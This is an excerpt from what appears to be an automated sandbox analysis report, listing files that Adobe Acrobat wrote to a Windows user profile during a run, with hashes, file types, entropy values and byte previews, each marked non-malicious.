                                                                      SHA-512:84F114F38F8F5F90DC86BADDAD9FAE1724EADF6A05C2B3CCD65D2918C068FC56A138D333348B55D7A69F935999758475B9D41A4DA860A1DAAAA4CA37534E9A40
                                                                      Malicious:false
                                                                      Preview:BMV.......6...(...k...h..... ....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                      Category:dropped
                                                                      Size (bytes):86016
                                                                      Entropy (8bit):4.438800794702761
                                                                      Encrypted:false
                                                                      SSDEEP:384:yeaci5GCiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1yurVgazUpUTTGt
                                                                      MD5:BC0363B10B41B058B1831C25EC826314
                                                                      SHA1:134C90632A1026CBB7E872CACE413B4795C308AA
                                                                      SHA-256:BF4401B12F914C1E9FA513E8AD6CE91836BA7AEAFE1C3F386AA17935613BCB6A
                                                                      SHA-512:D6F1FCC7E547DE7358C2FCB4A02EC82A8FDD85EDC5F5D46CD2EB89B17D9AFC04BFEC04A6E88642597BD3821F68A9BB55D045CCB21F015C1608C7F5D3752552EF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):3.7742811034714814
                                                                      Encrypted:false
                                                                      SSDEEP:48:7MWp/E2ioyVDQioy3DoWoy1CABoy14TKOioy1noy1AYoy1Wioy1hioybioyGloy+:7NpjuDQ0iA8ZXKQH34b9IVXEBodRBkT
                                                                      MD5:EB3A13BACDB409E3E08DF1D189237DC3
                                                                      SHA1:0149D4E36654E2B6FDAC7123B229ADCAB9074C8A
                                                                      SHA-256:B7A46908A533064F720DDD284A1735FBE6FF2372E10CAAAD41B98742D131B937
                                                                      SHA-512:678C1ABBDB902D3610270FADEF024270E1AF88490E281947920864963C17CD695E641D5CEEC94E6BCDCF9B97564872E39DA12967F097DC72BAB808CA5CC49D38
                                                                      Malicious:false
                                                                      Preview:.... .c.....(..^...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Certificate, Version=3
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.746484906506307
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFkljS2MlltfllXlE/HT8kg+lz1NNX8RolJuRdxLlGB9lQRYwpDdt:kK52MlleT8Qlz7NMa8RdWBwRd
                                                                      MD5:5C9EBD26F11837A1782F0C061EC6667E
                                                                      SHA1:271195884B39231AFCD2B6897BD11351B93F729B
                                                                      SHA-256:FBA3D2DB4DAF1AB8115BE62B5C6BEBC03D0AF43CED41378D5BA36893A826F566
                                                                      SHA-512:4907A3E734414CF6B255A2A0653B8B4C89D5418DC4A697C0E48F5F4B4839C3BBFC7E7AC1702228A0450242E84AB05CA74BBEA1DEC193D45B76DFA2C807DB4B2F
                                                                      Malicious:false
                                                                      Preview:p...... ..........g.>X..(....................................................... ..........W....E...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.2418003062782916
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKPMllL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:saDImsLNkPlE99SNxAhUe/3
                                                                      MD5:75476081134FB0957FB8BD9B7DFCF4F4
                                                                      SHA1:73A18D52EF840F85B95EFF0BF1E70FEFA5D6675A
                                                                      SHA-256:3348F7C22F963C504A164D0924B206B3BDAB6048FF037AF051AB6003BD8E4E9E
                                                                      SHA-512:F06C88D32C86D26ED9BC841A3CF6ACCAF7635FBBC9EB89BBD4B30855033DF08488869CADA4C07AE9193A0FD0F96DCCABAE44871370A5D6DF6BB782E0862C4D56
                                                                      Malicious:false
                                                                      Preview:p...... .........$J.>X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.3588

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.3588

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.390220230795998
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJM3g98kUwPeUkwRe9:YvXKX43sMsdTeO6anGMbLUkee9
                                                                      MD5:4D38E149530DB51DCDBFF677ECEE54C4
                                                                      SHA1:324DC78808CB8A2C032E4F77A35E0102D7BEAD90
                                                                      SHA-256:12F69DD5FA1B93E2C707D141786EB747140B6D045B9B048AA40DBA1CA71A9433
                                                                      SHA-512:A8AEABE12D0D471E66CF6771604A9FD9F964BBAADD6BD82668874ADF2B57189E780AC3C7DC92B2187178B7D906CCE89412433AC4D1646519FE13FC719EA89284
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.328412172168555
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfBoTfXpnrPeUkwRe9:YvXKX43sMsdTeO6anGWTfXcUkee9
                                                                      MD5:E445435A9D3F10392573432B6F786083
                                                                      SHA1:7120254955E764235FB83D2F7E204416D2283754
                                                                      SHA-256:9B0475B67B03C6AFD0115594C6A13EF0A3311A86A6D14BB327D90BC45889597C
                                                                      SHA-512:62C0BCDFAFE33C646FADEA15CA8D163ABA6A09D96A99D4C6200A75A958BC455CA24DA3CE76D256D9F0975E8C9400DBCB98655670ACC477688B619082B540351A
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.305955370387177
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfBD2G6UpnrPeUkwRe9:YvXKX43sMsdTeO6anGR22cUkee9
                                                                      MD5:A4795AC59851EAB0B44B046AC958A766
                                                                      SHA1:D17E5FD226315CF52AA41AE451776F89D06D6C6C
                                                                      SHA-256:CE730DAD8B0A80460495B11EFAEE3D53A07F5FB567341D998FB3FD14DB8FF24A
                                                                      SHA-512:AD0EDED3435C79F6E410B57D13546DE6E594707826A2D0BF396259E442F148E0133D42D7E0A51430CB3BA859496878E60FC615112705BEA1AEFDA85F12CDC283
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):285
                                                                      Entropy (8bit):5.378040879371123
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfPmwrPeUkwRe9:YvXKX43sMsdTeO6anGH56Ukee9
                                                                      MD5:AABB70D2C396AA44C0BB92631BB3999B
                                                                      SHA1:FE158A783EE41AC257AFC887282F997691E71E9A
                                                                      SHA-256:6D1926E075711775BE32F4D43412CA318924CAC3D3795FAC8210486FD84985ED
                                                                      SHA-512:0E738E199E02D53FC922EE83AE13ECA224C6232D0DE618907F8B3C3953579B5B8021BCA48463E3EF0001547D2A84AA546B695DC549D0347AD775F6BE44E49775
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1123
                                                                      Entropy (8bit):5.6896372347216415
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6X43sMmeOypLgE9cQx8LennAvzBvkn0RCmK8czOCCSE5:YvXUeNhgy6SAFv5Ah8cv/E5
                                                                      MD5:E6BD2CC85EEB8063334EEDCE27D6E030
                                                                      SHA1:6E84E1234375F51166D69A81C923CC770EDE0A50
                                                                      SHA-256:68B29E281B2DD0435CD9351C982AAED20FBA739B5BA70DC226EB3AF17DAE3E6B
                                                                      SHA-512:B6B817B68D2C23E3DD43496FA2E9847E6FB5E118902D34615D2E715A400C438675133D0A4F59C6F97AA29E0384D3626F26B34A272CE3CF861D4193C3B676B8FD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.314844706734747
                                                                      Encrypted:false
